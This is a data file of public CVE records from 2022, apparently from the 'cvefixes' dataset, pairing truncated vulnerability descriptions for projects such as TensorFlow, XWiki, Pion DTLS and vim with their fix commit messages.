CVE-2022-29186\n\n[{'lang': 'en', 'value': \"Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Rundeck community and rundeck-enterprise docker images contained a pre-generated SSH keypair. If the id_rsa.pub public key of the keypair was copied to authorized_keys files on remote host, those hosts would allow access to anyone with the exposed private credentials. This misconfiguration only impacts Rundeck Docker instances of PagerDuty® Process Aut", "cve_id": "CVE-2022-29186", "source": "cvefixes", "timestamp": ""} {"id": "1bf7ee7ac141f8892804", "text": "CVE: CVE-2022-29188\n\n[{'lang': 'en', 'value': 'Smokescreen is an HTTP proxy. The primary use case for Smokescreen is to prevent server-side request forgery (SSRF) attacks in which external attackers leverage the behavior of applications to connect to or scan internal infrastructure. Smokescreen also offers an option to deny access to additional (e.g., external) URLs by way of a deny list. There was an issue in Smokescreen that made it possible to bypass the deny list feature by surrounding the h", "cve_id": "CVE-2022-29188", "source": "cvefixes", "timestamp": ""} {"id": "25f4cc4fb2b26fb09bbb", "text": "CVE: CVE-2022-29189\n\n[{'lang': 'en', 'value': 'Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.4, a buffer that was used for inbound network traffic had no upper limit. Pion DTLS would buffer all network traffic from the remote user until the handshake completes or timed out. An attacker could exploit this to cause excessive memory usage. Version 2.1.4 contains a patch for this issue. There are currently no known workarounds available.'}]\n\nFix commit: ", "cve_id": "CVE-2022-29189", "source": "cvefixes", "timestamp": ""} {"id": "34bb65cd35f20f26f129", "text": "CVE: CVE-2022-29190\n\n[{'lang': 'en', 'value': 'Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.4, an attacker can send packets that sends Pion DTLS into an infinite loop when processing. Version 2.1.4 contains a patch for this issue. There are currently no known workarounds available.'}]\n\nFix commit: Don't attempt to append zero length fragments\n\nBefore the fragmentBuffer would process zero length fragments. Since\nthey are zero length the append would ", "cve_id": "CVE-2022-29190", "source": "cvefixes", "timestamp": ""} {"id": "d7ec1524780a79d5b2ab", "text": "CVE: CVE-2022-29191\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.GetSessionTensor` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.GetSessionTensor vulnerability with invalid handle.\n", "cve_id": "CVE-2022-29191", "source": "cvefixes", "timestamp": ""} {"id": "045de302c113006270f1", "text": "CVE: CVE-2022-29192\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.QuantizeAndDequantizeV4Grad` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.QuantizeAndDequantizeV4Grad vulnerability", "cve_id": "CVE-2022-29192", "source": "cvefixes", "timestamp": ""} {"id": "c360de1ee14e125b39a2", "text": "CVE: CVE-2022-29193\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.TensorSummaryV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.TensorSummaryV2 vulnerability with invalid serialized", "cve_id": "CVE-2022-29193", "source": "cvefixes", "timestamp": ""} {"id": "63c96be7b661cfce4860", "text": "CVE: CVE-2022-29194\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.DeleteSessionTensor` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.DeleteSessionTensor vulnerability with invalid `h", "cve_id": "CVE-2022-29194", "source": "cvefixes", "timestamp": ""} {"id": "501eb3a5ccb91bcbcd6a", "text": "CVE: CVE-2022-29195\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.StagePeek` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `index` is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for t", "cve_id": "CVE-2022-29195", "source": "cvefixes", "timestamp": ""} {"id": "3cf53754363db20cd464", "text": "CVE: CVE-2022-29196\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.Conv3DBackpropFilterV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate that the `filter_sizes` argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\n", "cve_id": "CVE-2022-29196", "source": "cvefixes", "timestamp": ""} {"id": "71c6646c6e4783e8a62e", "text": "CVE: CVE-2022-29197\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.UnsortedSegmentJoin` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `num_segments` is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 cont", "cve_id": "CVE-2022-29197", "source": "cvefixes", "timestamp": ""} {"id": "5f230218e71190597d1f", "text": "CVE: CVE-2022-29198\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SparseTensorToCSRSparseMatrix` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `dense_shape` is a vector and `indices` is a matrix (as part of requirements for sparse tensors) but there is no validation f", "cve_id": "CVE-2022-29198", "source": "cvefixes", "timestamp": ""} {"id": "b2ffc41389c8622e7b8b", "text": "CVE: CVE-2022-29199\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LoadAndRemapMatrix does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `initializing_values` is a vector but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4", "cve_id": "CVE-2022-29199", "source": "cvefixes", "timestamp": ""} {"id": "0e274e63c3f74acf74df", "text": "CVE: CVE-2022-29200\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LSTMBlockCell` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in `CHECK`-failures when the elements of the tensor are accessed. ", "cve_id": "CVE-2022-29200", "source": "cvefixes", "timestamp": ""} {"id": "f21bd74f8576666021ae", "text": "CVE: CVE-2022-29201\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.QuantizedConv2D` does not fully validate the input arguments. In this case, references get bound to `nullptr` for each argument that is empty. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix undefined behavior in QuantizedConv2D\n\nAdded more input validation and tes", "cve_id": "CVE-2022-29201", "source": "cvefixes", "timestamp": ""} {"id": "e96ad989e132deb9beba", "text": "CVE: CVE-2022-29202\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.ragged.constant` does not fully validate the input arguments. This results in a denial of service by consuming all available memory. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Prevent denial of service in `tf.ragged.constant`\n\nFixes #55199\n\nPiperOrigin-RevId: 442029525", "cve_id": "CVE-2022-29202", "source": "cvefixes", "timestamp": ""} {"id": "37344bf57a7bca7ad3fa", "text": "CVE: CVE-2022-29203\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2,", "cve_id": "CVE-2022-29203", "source": "cvefixes", "timestamp": ""} {"id": "795bc1aeed04806f96a6", "text": "CVE: CVE-2022-29204\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.UnsortedSegmentJoin` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `num_segments` is a positive scalar but there is no validation. Since this value is used to allocate the output tensor, a negative valu", "cve_id": "CVE-2022-29204", "source": "cvefixes", "timestamp": ""} {"id": "e398b60ecb8455fc63e9", "text": "CVE: CVE-2022-29205\n\n[{'lang': 'en', 'value': \"TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, there is a potential for segfault / denial of service in TensorFlow by calling `tf.compat.v1.*` ops which don't yet have support for quantized types, which was added after migration to TensorFlow 2.x. In these scenarios, since the kernel is missing, a `nullptr` value is passed to `ParseDimensionValue` for the `py_value` argument. Then, this ", "cve_id": "CVE-2022-29205", "source": "cvefixes", "timestamp": ""} {"id": "eb8d03514ff0db1f77dc", "text": "CVE: CVE-2022-29206\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SparseTensorDenseAdd` does not fully validate the input arguments. In this case, a reference gets bound to a `nullptr` during kernel execution. This is undefined behavior. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix UB in SparseTensorDenseAdd\n\nAdded more input ", "cve_id": "CVE-2022-29206", "source": "cvefixes", "timestamp": ""} {"id": "521c7010e43d09e295a6", "text": "CVE: CVE-2022-29207\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, multiple TensorFlow operations misbehave in eager mode when the resource handle provided to them is invalid. In graph mode, it would have been impossible to perform these API calls, but migration to TF 2.x eager mode opened up this vulnerability. If the resource handle is empty, then a reference is bound to a null pointer inside TensorFlow c", "cve_id": "CVE-2022-29207", "source": "cvefixes", "timestamp": ""} {"id": "ba2716ab71f662147f23", "text": "CVE: CVE-2022-29208\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.EditDistance` has incomplete validation. Users can pass negative values to cause a segmentation fault based denial of service. In multiple places throughout the code, one may compute an index for a write operation. However, the existing validation only checks against the upper bound of the array. Hence, it i", "cve_id": "CVE-2022-29208", "source": "cvefixes", "timestamp": ""} {"id": "91db9e86e05d3ae6684d", "text": "CVE: CVE-2022-29209\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the macros that TensorFlow uses for writing assertions (e.g., `CHECK_LT`, `CHECK_GT`, etc.) have an incorrect logic when comparing `size_t` and `int` values. Due to type conversion rules, several of the macros would trigger incorrectly. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Merge pull request", "cve_id": "CVE-2022-29209", "source": "cvefixes", "timestamp": ""} {"id": "c9e97a7810905043a7ae", "text": "CVE: CVE-2022-2921\n\n[{'lang': 'en', 'value': 'Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository notrinos/notrinoserp prior to v0.7. This results in privilege escalation to a system administrator account. An attacker can gain access to protected functionality such as create/update companies, install/update languages, install/activate extensions, install/activate themes and other permissive actions.'}]\n\nFix commit: changed password hash method from md5 to bcryp", "cve_id": "CVE-2022-2921", "source": "cvefixes", "timestamp": ""} {"id": "10f36ae14cb89e66e2aa", "text": "CVE: CVE-2022-29210\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. In version 2.8.0, the `TensorKey` hash function used total estimated `AllocatedBytes()`, which (a) is an estimate per tensor, and (b) is a very poor hash function for constants (e.g. `int32_t`). It also tried to access individual tensor bytes through `tensor.data()` of size `AllocatedBytes()`. This led to ASAN failures because the `AllocatedBytes()` is an estimate of total bytes allocated b", "cve_id": "CVE-2022-29210", "source": "cvefixes", "timestamp": ""} {"id": "8a7f9ddb51d833d60ade", "text": "CVE: CVE-2022-29211\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.histogram_fixed_width` is vulnerable to a crash when the values array contain `Not a Number` (`NaN`) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If `values` contains `NaN` then the result of the division is still `", "cve_id": "CVE-2022-29211", "source": "cvefixes", "timestamp": ""} {"id": "ae7fa344e0432e4ef3f2", "text": "CVE: CVE-2022-29212\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling `QuantizeMultiplierSmallerThanOneExp`, the `TFLITE_CHECK_LT` as", "cve_id": "CVE-2022-29212", "source": "cvefixes", "timestamp": ""} {"id": "3c934f079f345565574f", "text": "CVE: CVE-2022-29213\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the `tf.compat.v1.signal.rfft2d` and `tf.compat.v1.signal.rfft3d` lack input validation and under certain condition can result in crashes (due to `CHECK`-failures). Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Merge pull request #55274 from yongtang:55263-tf.signal.rfft2d\n\nPiperOrigin-RevId: 4367366", "cve_id": "CVE-2022-29213", "source": "cvefixes", "timestamp": ""} {"id": "7f37ca24989a70fd2fb8", "text": "CVE: CVE-2022-29215\n\n[{'lang': 'en', 'value': 'RegionProtect is a plugin that allows users to manage certain events in certain regions of the world. Versions prior to 1.1.0 contain a YAML injection vulnerability that can cause an instant server crash if the passed arguments are not matched. Version 1.1.0 contains a patch for this issue. As a workaround, restrict operator permissions to untrusted people and avoid entering arguments likely to cause a crash.'}]\n\nFix commit: Patch the hole\n\nThanks t", "cve_id": "CVE-2022-29215", "source": "cvefixes", "timestamp": ""} {"id": "a7ef1a4517a09d4ab10d", "text": "CVE: CVE-2022-29216\n\n[{'lang': 'en', 'value': \"TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not", "cve_id": "CVE-2022-29216", "source": "cvefixes", "timestamp": ""} {"id": "7c5e801156b7d2a78c28", "text": "CVE: CVE-2022-29217\n\n[{'lang': 'en', 'value': 'PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms", "cve_id": "CVE-2022-29217", "source": "cvefixes", "timestamp": ""} {"id": "df1a6dce44b89c6ee4d6", "text": "CVE: CVE-2022-29220\n\n[{'lang': 'en', 'value': 'github-action-merge-dependabot is an action that automatically approves and merges dependabot pull requests (PRs). Prior to version 3.2.0, github-action-merge-dependabot does not check if a commit created by dependabot is verified with the proper GPG key. There is just a check if the actor is set to `dependabot[bot]` to determine if the PR is a legit PR. Theoretically, an owner of a seemingly valid and legit action in the pipeline can check if the P", "cve_id": "CVE-2022-29220", "source": "cvefixes", "timestamp": ""} {"id": "95da08360841dbf9a2a6", "text": "CVE: CVE-2022-29221\n\n[{'lang': 'en', 'value': 'Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.'}]\n\nFix commit: Merge branch 'secu", "cve_id": "CVE-2022-29221", "source": "cvefixes", "timestamp": ""} {"id": "00137ecb5687c68d5a3f", "text": "CVE: CVE-2022-29222\n\n[{'lang': 'en', 'value': \"Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.5, a DTLS Client could provide a Certificate that it doesn't posses the private key for and Pion DTLS wouldn't reject it. This issue affects users that are using Client certificates only. The connection itself is still secure. The Certificate provided by clients can't be trusted when using a Pion DTLS server prior to version 2.1.5. Users should upgrade to ver", "cve_id": "CVE-2022-29222", "source": "cvefixes", "timestamp": ""} {"id": "2aca2f2b36bb259063d6", "text": "CVE: CVE-2022-2923\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0240.'}]\n\nFix commit: patch 9.0.0240: crash when using \":mkspell\" with an empty .dic file\n\nProblem: Crash when using \":mkspell\" with an empty .dic file.\nSolution: Check for an empty word tree.", "cve_id": "CVE-2022-2923", "source": "cvefixes", "timestamp": ""} {"id": "72366349bfe114661d19", "text": "CVE: CVE-2022-29237\n\n[{'lang': 'en', 'value': \"Opencast is a free and open source solution for automated video capture and distribution at scale. Prior to Opencast 10.14 and 11.7, users could pass along URLs for files belonging to organizations other than the user's own, which Opencast would then import into the current organization, bypassing organizational barriers. Attackers must have full access to Opencast's ingest REST interface, and also know internal links to resources in another organiz", "cve_id": "CVE-2022-29237", "source": "cvefixes", "timestamp": ""} {"id": "667fafe90573b3cca42a", "text": "CVE: CVE-2022-29242\n\n[{'lang': 'en', 'value': 'GOST engine is a reference implementation of the Russian GOST crypto algorithms for OpenSSL. TLS clients using GOST engine when ciphersuite `TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC` is agreed and the server uses 512 bit GOST secret keys are vulnerable to buffer overflow. GOST engine version 3.0.1 contains a patch for this issue. Disabling ciphersuite `TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC` is a possible workaround.'}]\n\nFix commit: On unp", "cve_id": "CVE-2022-29242", "source": "cvefixes", "timestamp": ""} {"id": "6a333aeb371a93d9afa2", "text": "CVE: CVE-2022-29242\n\n[{'lang': 'en', 'value': 'GOST engine is a reference implementation of the Russian GOST crypto algorithms for OpenSSL. TLS clients using GOST engine when ciphersuite `TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC` is agreed and the server uses 512 bit GOST secret keys are vulnerable to buffer overflow. GOST engine version 3.0.1 contains a patch for this issue. Disabling ciphersuite `TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC` is a possible workaround.'}]\n\nFix commit: Fix bu", "cve_id": "CVE-2022-29242", "source": "cvefixes", "timestamp": ""} {"id": "eef3c46db097a7bfa451", "text": "CVE: CVE-2022-29245\n\n[{'lang': 'en', 'value': 'SSH.NET is a Secure Shell (SSH) library for .NET. In versions 2020.0.0 and 2020.0.1, during an `X25519` key exchange, the client’s private key is generated with `System.Random`. `System.Random` is not a cryptographically secure random number generator, it must therefore not be used for cryptographic purposes. When establishing an SSH connection to a remote host, during the X25519 key exchange, the private key is generated with a weak random number", "cve_id": "CVE-2022-29245", "source": "cvefixes", "timestamp": ""} {"id": "662697559cf4f6ce0088", "text": "CVE: CVE-2022-29248\n\n[{'lang': 'en', 'value': \"Guzzle is a PHP HTTP client. Guzzle prior to versions 6.5.6 and 7.4.3 contains a vulnerability with the cookie middleware. The vulnerability is that it is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header, allowing a malicious server to set cookies for unrelated domains. The cookie middleware is disabled by default, so most library consumers will not be affected by this issue. Only those", "cve_id": "CVE-2022-29248", "source": "cvefixes", "timestamp": ""} {"id": "015c19133a86ef777f8a", "text": "CVE: CVE-2022-29251\n\n[{'lang': 'en', 'value': 'XWiki Platform Flamingo Theme UI is a tool that allows customization and preview of any Flamingo-based skin. Starting with versions 6.2.4 and 6.3-rc-1, a possible cross-site scripting vector is present in the `FlamingoThemesCode.WebHomeSheet` wiki page related to the \"newThemeName\" form field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `FlamingoThemesCode.WebHo", "cve_id": "CVE-2022-29251", "source": "cvefixes", "timestamp": ""} {"id": "ee5141883f314aca4d98", "text": "CVE: CVE-2022-29252\n\n[{'lang': 'en', 'value': 'XWiki Platform Wiki UI Main Wiki is a package for managing subwikis. Starting with version 5.3-milestone-2, XWiki Platform Wiki UI Main Wiki contains a possible cross-site scripting vector in the `WikiManager.JoinWiki ` wiki page related to the \"requestJoin\" field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `WikiManager.JoinWiki` (with wiki editor) according to", "cve_id": "CVE-2022-29252", "source": "cvefixes", "timestamp": ""} {"id": "b07652e49951b70c5fbd", "text": "CVE: CVE-2022-29253\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting with version 8.3-rc-1 and prior to versions 12.10.3 and 14.0, one can ask for any file located in the classloader using the template API and a path with \"..\" in it. The issue is patched in versions 14.0 and 13.10.3. There is no easy workaround for this issue.'}]\n\nFix commit: XWIKI-19349: Bad handling of classloader templates path resolut", "cve_id": "CVE-2022-29253", "source": "cvefixes", "timestamp": ""} {"id": "e10774a468aafaf13965", "text": "CVE: CVE-2022-29254\n\n[{'lang': 'en', 'value': 'silverstripe-omnipay is a SilverStripe integration with Omnipay PHP payments library. For a subset of Omnipay gateways (those that use intermediary states like `isNotification()` or `isRedirect()`), if the payment identifier or success URL is exposed it is possible for payments to be prematurely marked as completed without payment being taken. This is mitigated by the fact that most payment gateways hide this information from users, however some iss", "cve_id": "CVE-2022-29254", "source": "cvefixes", "timestamp": ""} {"id": "fe257e704e476dade48d", "text": "CVE: CVE-2022-29255\n\n[{'lang': 'en', 'value': 'Vyper is a Pythonic Smart Contract Language for the ethereum virtual machine. In versions prior to 0.3.4 when a calling an external contract with no return value, the contract address (including side effects) could be evaluated twice. This may result in incorrect outcomes for contracts. This issue has been addressed in v0.3.4.'}]\n\nFix commit: Merge pull request from GHSA-4v9q-cgpw-cf38\n\nin external call codegen, when `extcodesize` is called on the t", "cve_id": "CVE-2022-29255", "source": "cvefixes", "timestamp": ""} {"id": "44a8ecaa2759f04b995f", "text": "CVE: CVE-2022-29256\n\n[{'lang': 'en', 'value': 'sharp is an application for Node.js image processing. Prior to version 0.30.5, there is a possible vulnerability in logic that is run only at `npm install` time when installing versions of `sharp` prior to the latest v0.30.5. If an attacker has the ability to set the value of the `PKG_CONFIG_PATH` environment variable in a build environment then they might be able to use this to inject an arbitrary command at `npm install` time. This is not part of ", "cve_id": "CVE-2022-29256", "source": "cvefixes", "timestamp": ""} {"id": "1df4a6287c4395061724", "text": "CVE: CVE-2022-29258\n\n[{'lang': 'en', 'value': 'XWiki Platform Filter UI provides a generic user interface to convert from a XWiki Filter input stream to an output stream with settings for each stream. Starting with versions 6.0-milestone-2 and 5.4.4 and prior to versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3, XWiki Platform Filter UI contains a possible cross-site scripting vector in the `Filter.FilterStreamDescriptorForm` wiki page related to pretty much all the form fields printed in the ho", "cve_id": "CVE-2022-29258", "source": "cvefixes", "timestamp": ""} {"id": "ffe899acdc9afa0593aa", "text": "CVE: CVE-2022-29264\n\n[{'lang': 'en', 'value': 'An issue was discovered in coreboot 4.13 through 4.16. On APs, arbitrary code execution in SMM may occur.'}]\n\nFix commit: cpu/x86/smm: Introduce SMM module loader version 2\n\nXeon-SP Skylake Scalable Processor can have 36 CPU threads (18 cores).\nCurrent coreboot SMM is unable to handle more than ~32 CPU threads.\nThis patch introduces a version 2 of the SMM module loader which\naddresses this problem. Having two versions of the SMM module loader\npreven", "cve_id": "CVE-2022-29264", "source": "cvefixes", "timestamp": ""} {"id": "f1fa53f1a829924cc8d0", "text": "CVE: CVE-2022-2927\n\n[{'lang': 'en', 'value': 'Weak Password Requirements in GitHub repository notrinos/notrinoserp prior to 0.7.'}]\n\nFix commit: added password validation for adding new user.", "cve_id": "CVE-2022-2927", "source": "cvefixes", "timestamp": ""} {"id": "0ee0327873dae873ad68", "text": "CVE: CVE-2022-2932\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository bustle/mobiledoc-kit prior to 0.14.2.'}]\n\nFix commit: Update dependencies 8/18/22 (#771)\n\n* Update devDependencies\r\n\r\n* Update mobiledoc-dom-renderer\r\n\r\n* pin", "cve_id": "CVE-2022-2932", "source": "cvefixes", "timestamp": ""} {"id": "3eb6f5eb123fceb0cdde", "text": "CVE: CVE-2022-29339\n\n[{'lang': 'en', 'value': 'In GPAC 2.1-DEV-rev87-g053aae8-master, function BS_ReadByte() in utils/bitstream.c has a failed assertion, which causes a Denial of Service. This vulnerability was fixed in commit 9ea93a2.'}]\n\nFix commit: fixed #2165", "cve_id": "CVE-2022-29339", "source": "cvefixes", "timestamp": ""} {"id": "3f2b21f79ee780b86f43", "text": "CVE: CVE-2022-29340\n\n[{'lang': 'en', 'value': 'GPAC 2.1-DEV-rev87-g053aae8-master. has a Null Pointer Dereference vulnerability in gf_isom_parse_movie_boxes_internal due to improper return value handling of GF_SKIP_BOX, which causes a Denial of Service. This vulnerability was fixed in commit 37592ad.'}]\n\nFix commit: fixed #2163", "cve_id": "CVE-2022-29340", "source": "cvefixes", "timestamp": ""} {"id": "21bc1dd15b3c4ff9f57c", "text": "CVE: CVE-2022-29361\n\n[{'lang': 'en', 'value': \"** DISPUTED ** Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project.\"}]\n\nFix commit: Merge branch '2.0.x'", "cve_id": "CVE-2022-29361", "source": "cvefixes", "timestamp": ""} {"id": "45426d32f25c3079d950", "text": "CVE: CVE-2022-29368\n\n[{'lang': 'en', 'value': 'Moddable commit before 135aa9a4a6a9b49b60aa730ebc3bcc6247d75c45 was discovered to contain an out-of-bounds read via the function fxUint8Getter at /moddable/xs/sources/xsDataView.c.'}]\n\nFix commit: XS: #896", "cve_id": "CVE-2022-29368", "source": "cvefixes", "timestamp": ""} {"id": "1e65f6f482189b40883d", "text": "CVE: CVE-2022-29369\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation via njs_lvlhsh_bucket_find at njs_lvlhsh.c.'}]\n\nFix commit: Fixed njs_vmcode_interpreter() when \"toString\" conversion fails.\n\nPreviously, while interpreting a user function, njs_vmcode_interpreter()\nmight return prematurely when an error happens. This is not correct\nbecause the current frame has to be unwound (or exception caught)\nfirst.\n\nThe fix is exit through only 5 appropriate ", "cve_id": "CVE-2022-29369", "source": "cvefixes", "timestamp": ""} {"id": "e870697b7d48ea6b20b0", "text": "CVE: CVE-2022-29379\n\n[{'lang': 'en', 'value': '** DISPUTED ** Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c. NOTE: multiple third parties dispute this report, e.g., the behavior is only found in unreleased development code that was not part of the 0.7.2, 0.7.3, or 0.7.4 release.'}]\n\nFix commit: Fixed typo while calculating module path length.\n\nThe issue was introduced in 77c398f26d7e (not released yet).", "cve_id": "CVE-2022-29379", "source": "cvefixes", "timestamp": ""} {"id": "93f5839934ae525b0140", "text": "CVE: CVE-2022-2946\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0246.'}]\n\nFix commit: patch 9.0.0246: using freed memory when 'tagfunc' deletes the buffer\n\nProblem: Using freed memory when 'tagfunc' deletes the buffer.\nSolution: Make a copy of the tag name.", "cve_id": "CVE-2022-2946", "source": "cvefixes", "timestamp": ""} {"id": "54b03090eb234464d274", "text": "CVE: CVE-2022-29527\n\n[{'lang': 'en', 'value': 'Amazon AWS amazon-ssm-agent before 3.1.1208.0 creates a 